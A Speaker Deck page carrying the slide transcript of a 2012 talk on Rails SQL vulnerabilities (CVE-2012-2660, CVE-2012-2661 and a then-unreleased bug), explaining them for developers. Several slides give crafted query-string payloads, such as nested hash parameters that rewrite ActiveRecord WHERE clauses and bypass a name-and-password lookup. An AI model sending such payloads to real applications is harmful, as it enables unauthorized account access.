Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Recent Rails SQL Issues" - 2012

711272a06d435ca5139b50874351cdbf?s=47 Justin Collins
April 23, 2015
Programming
0
47

"Recent Rails SQL Issues" - 2012

711272a06d435ca5139b50874351cdbf?s=128

Justin Collins

April 23, 2015
Tweet

More Decks by Justin Collins

See All by Justin Collins
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
32
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
340
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
81
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
120
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
260
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
230
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
0
140
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
8
950
711272a06d435ca5139b50874351cdbf?s=48 presidentbeef
1
120

Other Decks in Programming

See All in Programming
Ae276805027a01983503c3edafbdb6b2?s=48 martysuzuki
0
400
B1bddcb899ec3060fe9913f3cb70dbb6?s=48 lmt_swallow
5
1.5k
Fd223ed912b754bc4c4338d148a69c78?s=48 kotaroooo0
13
4.2k
E0e036f89c14b3e59640318eedf9670b?s=48 bkuhlmann
4
310
15934fa2aa7b2ce21f091e9b7cffa856?s=48 manfredsteyer
PRO
0
220
9c87ec93b3b2aff85a03d3b56e7b8db8?s=48 makoga
0
340
D1dd88d67a1b17b9d2ad981b75d205f3?s=48 myamashii
0
240
E83cdc415df47ab3eae30957ae7e2d33?s=48 ykpythemind
0
210
6317140224223dc052beb887078cc810?s=48 nelca
0
130
8ffce1486e39ee3f43f52be5580b9966?s=48 luiznasciment0
1
150
1a517fb4f2fe1ad4c6bbfc0cbb17ba10?s=48 kasai441
0
240
0ed10d1154c696886ca483fe827cb299?s=48 thatjeffsmith
0
110

Featured

See All Featured
Bfd6b681ec6e8c9bef82ff0521c364f7?s=48 kastner
54
2k
Ecdea9b9714877b86cee08458f085481?s=48 trallard
16
890
F29327647a9cff5c69618bae420792ea?s=48 tenderlove
55
3.6k
053e75a5b48b44d6dd0612795dfb326d?s=48 notwaldorf
24
2.2k
95d9f37115fbb0d13135d0f77132f856?s=48 morganepeng
22
1.3k
F716e5f737fcfb03f2cf8d1a184f1dbe?s=48 nonsquared
81
3.5k
C9b18d9dff88a9dd2393364c2b3b21bd?s=48 colly
188
14k
78b475797a14c84799063c7cd073962f?s=48 holman
462
280k
E4f5d494ebdc9e7cce1aecf3ce3e8bc1?s=48 shpigford
370
42k
D47656e20ff5e42f125fc5ea0fd636c6?s=48 tmm1
62
9.9k
7cbd3f5f922d798cc312eaf596de7ae6?s=48 iamctodd
23
2.3k
Aff5641764408271f7bc398f2097edd0?s=48 denniskardys
219
120k

Transcript

  1. Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661

  2. CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x

    and 3.x

  3. ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end

  4. Query Parameters ?name[] {"name"=>[nil]}

  5. ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end

  6. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

  7. CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query

    keys Affects Rails 3.x

  8. ActiveRecord Query User.where(:name => params[:name])

  9. ActiveRecord Query User.where("users.name" => params[:name])

  10. Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}

  11. ActiveRecord Query User.where(:name => {"users.id" => "1"})

  12. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1

  13. Unreleased Vulnerability Allows some manipulation of WHERE clause via nested

    hashes in query values Affects 2.3.x and 3.x

  14. ActiveRecord Query User.where(:name => params[:name], :password => params[:password])

  15. Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}

  16. ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )

  17. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1 AND "users"."id" = 1